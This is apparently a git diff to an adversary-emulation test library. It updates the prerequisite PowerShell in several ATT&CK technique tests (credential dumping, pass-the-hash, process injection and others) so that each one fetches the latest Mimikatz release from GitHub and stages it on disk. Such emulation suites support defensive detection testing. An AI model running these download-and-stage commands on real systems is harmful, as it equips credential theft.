diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 95a7a2f6..b3de5492 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -187,15 +187,8 @@ atomic_tests: if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' - $request = [System.Net.WebRequest]::Create($url) - $response = $request.GetResponse() - $realTagUrl = $response.ResponseUri.OriginalString - $version = $realTagUrl.split('/')[-1] - $fileName = 'mimikatz_trunk.zip' - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName - Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml index dd51330f..172d1834 100644 --- a/atomics/T1003.006/T1003.006.yaml +++ b/atomics/T1003.006/T1003.006.yaml @@ -32,7 +32,8 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index e6ecea77..03615920 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -63,8 +63,8 @@ atomic_tests: get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href - Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml index 7f38b3be..4e7df9db 100644 --- a/atomics/T1207/T1207.yaml +++ b/atomics/T1207/T1207.yaml @@ -46,7 +46,8 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml index 416e222d..2fc50b21 100644 --- a/atomics/T1550.002/T1550.002.yaml +++ b/atomics/T1550.002/T1550.002.yaml @@ -34,7 +34,8 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml index e3539161..4953be47 100644 --- a/atomics/T1550.003/T1550.003.yaml +++ b/atomics/T1550.003/T1550.003.yaml @@ -28,7 +28,8 @@ atomic_tests: if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml index 883b1fd4..cf55d773 100644 --- a/atomics/T1558.001/T1558.001.yaml +++ b/atomics/T1558.001/T1558.001.yaml @@ -39,7 +39,8 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force